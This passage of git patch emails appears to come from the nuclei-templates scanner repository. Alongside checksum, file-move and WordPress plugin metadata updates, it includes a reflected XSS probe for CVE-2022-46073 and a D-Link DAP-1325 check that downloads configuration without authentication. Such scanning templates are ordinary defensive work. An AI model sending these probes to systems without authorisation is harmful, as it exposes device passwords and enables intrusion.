workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From de6d6e5b565e16acbb93ffa9c9f0f87293a955b4 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 7 Jul 2023 17:21:56 +0530 Subject: [PATCH 514/609] moving file around --- .../misconfiguration}/proxy/open-proxy-external.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {misconfiguration => http/misconfiguration}/proxy/open-proxy-external.yaml (100%) diff --git a/misconfiguration/proxy/open-proxy-external.yaml b/http/misconfiguration/proxy/open-proxy-external.yaml similarity index 100% rename from misconfiguration/proxy/open-proxy-external.yaml rename to http/misconfiguration/proxy/open-proxy-external.yaml From 1efb217dd6b2399c662ebedc3ccbca931ae2ca63 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 11:52:38 +0000 Subject: [PATCH 515/609] Auto Generated New Template Addition List [Fri Jul 7 11:52:38 UTC 2023] :robot: --- .new-additions | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.new-additions b/.new-additions index a68c45826e..faa88a2582 100644 --- a/.new-additions +++ b/.new-additions @@ -79,12 +79,12 @@ http/exposures/tokens/alibaba/alibaba-secretkey-id.yaml http/exposures/tokens/asana/asana-client-id.yaml http/exposures/tokens/asana/asana-client-secret.yaml http/exposures/tokens/atlassian-token.yaml +http/misconfiguration/proxy/open-proxy-external.yaml http/misconfiguration/unauth-temporal-web-ui.yaml http/vulnerabilities /other/sitemap-sql-injection.yaml http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml http/vulnerabilities/wordpress/notificationx-sqli.yaml http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml -misconfiguration/proxy/open-proxy-external.yaml network/misconfig/apache-dubbo-unauth.yaml network/misconfig/apache-rocketmq-broker-unauth.yaml From 7478956cd9d2bcf063e9b9261e60e5514883cebe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 11:52:49 +0000 Subject: [PATCH 516/609] Auto Generated Templates Checksum [Fri Jul 7 11:52:49 UTC 2023] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9e8ad0dca8..96c50951a8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4229,6 +4229,7 @@ http/misconfiguration/proxy/metadata-google.yaml:1af1293a92a2a863c8e559340dc4c18 http/misconfiguration/proxy/metadata-hetzner.yaml:dd8f9a2d9450f969568011d5464f68657bb0bceb http/misconfiguration/proxy/metadata-openstack.yaml:d108d421eba03be5e1dc95e3f2925a0d514d3a2d http/misconfiguration/proxy/metadata-oracle.yaml:74e6d921d81b38db938225ca24f104a48fceeee2 +http/misconfiguration/proxy/open-proxy-external.yaml:e8bd0621346886e2ddd41ca310c609052053cb13 http/misconfiguration/proxy/open-proxy-internal.yaml:4fdc217e331de9cc7cd2479953d1f38113eae123 http/misconfiguration/proxy/open-proxy-localhost.yaml:3e9ac6a8f82562a031e5c6e127501756cf7e92b4 http/misconfiguration/proxy/open-proxy-portscan.yaml:3200511b91414463b697697946b3379748bcd268 @@ -6450,7 +6451,6 @@ http/vulnerabilities/zend/zend-v1-xss.yaml:625c68da0d08d6c8a1381704b3861de7b6ffa http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml:d81ad79707b746a46d8dbf3825df18da17aba5bf http/vulnerabilities/zyxel/unauth-ztp-ping.yaml:61b1a8c05002d6ae6d87cc583301691b2cca06ab http/vulnerabilities /other/sitemap-sql-injection.yaml:7422e5c7bfbd6e0ce3b82ff788c311f7c2e3948e -misconfiguration/proxy/open-proxy-external.yaml:e8bd0621346886e2ddd41ca310c609052053cb13 network/backdoor/backdoored-zte.yaml:1f2965cc0dedda1f861b7835e5778923b08c6a5f network/backdoor/vsftpd-backdoor.yaml:e3bd4879b5595dae69e0610aed33f24c77c28232 network/cves/2001/CVE-2001-1473.yaml:1b508a5adba955e833c48e50e2b2eac33282a525 @@ -6575,7 +6575,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:d82135b5013a25e38a9e83ae2fe8a5bb0ab5b4a9 +templates-checksum.txt:9179f70db97f4b273bdc0f020c54b5f6f33f8ad4 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 4bc6ae766bb9a3ec3da2e70fb4e58897c0e9b6ba Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 7 Jul 2023 18:24:25 +0530 Subject: [PATCH 517/609] base url update and reference --- http/cves/2022/CVE-2022-46073.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/http/cves/2022/CVE-2022-46073.yaml b/http/cves/2022/CVE-2022-46073.yaml index 340c2afebc..e972f19203 100644 --- a/http/cves/2022/CVE-2022-46073.yaml +++ b/http/cves/2022/CVE-2022-46073.yaml @@ -9,6 +9,7 @@ info: reference: - https://yuyudhn.github.io/CVE-2022-46073/ - https://nvd.nist.gov/vuln/detail/CVE-2022-46073 + - https://www.youtube.com/watch?v=jT09Uiwl0Jo classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -19,10 +20,9 @@ info: tags: cve,cve2022,xss,helmet-store-showroom http: - - raw: - - | - GET /hss/?q=%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/hss/?q=%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E" matchers: - type: dsl From 82986ad64f6fcfcd84a82459cd53f0ad3a44a1ce Mon Sep 17 00:00:00 2001 From: Brandon Hutchinson Date: Fri, 7 Jul 2023 20:27:59 +0000 Subject: [PATCH 518/609] Create sunbird-dcim-panel.yaml --- http/exposed-panels/sunbird-dcim-panel.yaml | 35 +++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 http/exposed-panels/sunbird-dcim-panel.yaml diff --git a/http/exposed-panels/sunbird-dcim-panel.yaml b/http/exposed-panels/sunbird-dcim-panel.yaml new file mode 100644 index 0000000000..2390562708 --- /dev/null +++ b/http/exposed-panels/sunbird-dcim-panel.yaml @@ -0,0 +1,35 @@ +id: sunbird-dcim-panel + +info: + name: Sunbird DCIM - Detect + author: bhutch + severity: info + description: Sunbird DCIM login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + metadata: + max-request: 1 + shodan-query: html.title:"dcTrack - Operations" + tags: sunbird,panel,login + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/dcim/" + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'dcTrack - Operations' + + - type: status + status: + - 200 From c71000c739693833b192703ed62c8e6079e782ab Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 8 Jul 2023 01:28:30 +0000 Subject: [PATCH 519/609] Auto Generated cves.json [Sat Jul 8 01:28:30 UTC 2023] :robot: --- cves.json | 1 + cves.json-checksum.txt | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 758069cf20..9d08471d11 100644 --- a/cves.json +++ b/cves.json @@ -1899,6 +1899,7 @@ {"ID":"CVE-2023-32235","Info":{"Name":"Ghost CMS \u003c 5.42.1 - Path Traversal","Severity":"medium","Description":"Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-32235.yaml"} {"ID":"CVE-2023-32243","Info":{"Name":"WordPress Elementor Lite 5.7.1 - Arbitrary Password Reset","Severity":"critical","Description":"Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-32243.yaml"} {"ID":"CVE-2023-32315","Info":{"Name":"Openfire Administration Console - Authentication Bypass","Severity":"high","Description":"Openfire is an XMPP server licensed under the Open Source Apache License. Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users. This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2023/CVE-2023-32315.yaml"} +{"ID":"CVE-2023-33439","Info":{"Name":"Faculty Evaluation System v1.0 - SQL Injection","Severity":"high","Description":"Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/manage_task.php?id=\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-33439.yaml"} {"ID":"CVE-2023-33510","Info":{"Name":"Jeecg P3 Biz Chat - Local File Inclusion","Severity":"high","Description":"Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-33510.yaml"} {"ID":"CVE-2023-33568","Info":{"Name":"Dolibarr Unauthenticated Contacts Database Theft","Severity":"high","Description":"An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-33568.yaml"} {"ID":"CVE-2023-34362","Info":{"Name":"MOVEit Transfer - Remote Code Execution","Severity":"critical","Description":"In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), a SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database, and execute SQL statements that alter or delete database elements. NOTE: this is exploited in the wild in May and June 2023; exploitation of unpatched systems can occur via HTTP or HTTPS. All versions (e.g., 2020.0 and 2019x) before the five explicitly mentioned versions are affected, including older unsupported versions.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34362.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index ece42bdf4a..53c4357d05 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -4e9ea5be8a9b61669726b0fe75ee163e +62da879e5a5e489841b61d1e2b15bc19 From a7e213703bcb1ddbf236f311e7b5828f9e95b5cb Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sat, 8 Jul 2023 11:31:57 +0900 Subject: [PATCH 520/609] Create d-link-auth-bypass.yaml Security vulnerability known as Unauthenticated access to settings or Unauthenticated configuration download. This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication. Signed-off-by: GwanYeong Kim --- http/misconfiguration/d-link-auth-bypass.yaml | 38 +++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 http/misconfiguration/d-link-auth-bypass.yaml diff --git a/http/misconfiguration/d-link-auth-bypass.yaml b/http/misconfiguration/d-link-auth-bypass.yaml new file mode 100644 index 0000000000..cdc9213451 --- /dev/null +++ b/http/misconfiguration/d-link-auth-bypass.yaml @@ -0,0 +1,38 @@ +id: d-link-auth-bypass + +info: + name: D-Link DAP-1325 - Authentication Bypass + author: gy741 + severity: critical + description: | + Security vulnerability known as Unauthenticated access to settings or Unauthenticated configuration download. This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-287 + reference: + - https://www.exploit-db.com/exploits/51556 + tags: config,dump,dlink,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/ExportSettings.sh" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Password" + + - type: regex + part: header + regex: + - 'filename="(.*)_Settings.dat' + - 'application/octet-stream' + condition: and + + - type: status + status: + - 200 From 3e1cac710fa7ad27bc78d56fef54c6fdcd423bf8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 8 Jul 2023 04:01:58 +0000 Subject: [PATCH 521/609] Auto WordPress Plugins Update [Sat Jul 8 04:01:58 UTC 2023] :robot: --- helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt | 2 +- helpers/wordpress/plugins/gutenberg.txt | 2 +- helpers/wordpress/plugins/yith-woocommerce-wishlist.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/astra-widgets.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cloudflare.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-and-footer-scripts.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/iwp-client.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - http/technologies/wordpress/plugins/loginpress.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - http/technologies/wordpress/plugins/photo-gallery.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-builder.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/use-any-font.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - .../wordpress/plugins/velvet-blues-update-urls.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 203 files changed, 3 insertions(+), 203 deletions(-) diff --git a/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt b/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt index 21463eaa41..ffa7ee838d 100644 --- a/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt +++ b/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt @@ -1 +1 @@ -3.29 \ No newline at end of file +3.29.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/gutenberg.txt b/helpers/wordpress/plugins/gutenberg.txt index c9942a08a6..e45d9a25ce 100644 --- a/helpers/wordpress/plugins/gutenberg.txt +++ b/helpers/wordpress/plugins/gutenberg.txt @@ -1 +1 @@ -16.1.1 \ No newline at end of file +16.1.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/yith-woocommerce-wishlist.txt b/helpers/wordpress/plugins/yith-woocommerce-wishlist.txt index 8912835c48..6f0e719e09 100644 --- a/helpers/wordpress/plugins/yith-woocommerce-wishlist.txt +++ b/helpers/wordpress/plugins/yith-woocommerce-wishlist.txt @@ -1 +1 @@ -3.22.0 \ No newline at end of file +3.23.0 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index ebb5ba1042..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: - max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index fddfbf3118..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: - max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 7a6e8a76ec..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: - max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 940c0e614c..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: - max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 06cfd4950b..97f1d8c18f 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: - max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 90aa5881fd..10f104f2c7 100644 --- 